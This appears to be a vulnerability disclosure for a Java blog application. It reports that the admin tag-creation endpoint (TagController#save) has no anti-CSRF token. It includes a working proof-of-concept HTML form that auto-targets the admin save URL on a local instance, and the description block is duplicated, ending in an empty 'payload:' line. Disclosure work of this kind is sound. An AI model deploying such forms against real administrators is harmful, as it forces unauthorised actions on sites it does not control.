Description
The com.site.blog.my.core.controller.admin.TagController#save endpoint is vulnerable to CSRF. An attacker can force an administrator's browser to create arbitrary blog tags.
Impact
While seemingly low impact, an attacker can flood the database with thousands of junk tags, polluting the site’s metadata, affecting SEO, and potentially causing UI/layout issues or performance degradation in the administrative dashboard.
Cause
The tag creation logic relies solely on session cookies for authentication without checking for an anti-forgery token.
com.site.blog.my.core.controller.admin.TagController#save
Arbitrary tag creation
Before the attack
After the attack
payload:
<!doctype html>
<html>
<head><meta charset="UTF-8"><title>CSRF – /admin/tags/save</title></head>
<body>
<p>Create tag. POST /admin/tags/save.</p>
<form action="http://127.0.0.1:28083/admin/tags/save" method="POST">
<input type="hidden" name="tagName" value="csrf-tag">
<button type="submit">Send</button>
</form>
</body>
</html>
Description
The com.site.blog.my.core.controller.admin.TagController#save endpoint is vulnerable to CSRF. An attacker can force an administrator's browser to create arbitrary blog tags.
Impact
While seemingly low impact, an attacker can flood the database with thousands of junk tags, polluting the site’s metadata, affecting SEO, and potentially causing UI/layout issues or performance degradation in the administrative dashboard.
Cause
The tag creation logic relies solely on session cookies for authentication without checking for an anti-forgery token.
com.site.blog.my.core.controller.admin.TagController#save
Arbitrary tag creation
Before the attack
After the attack
payload: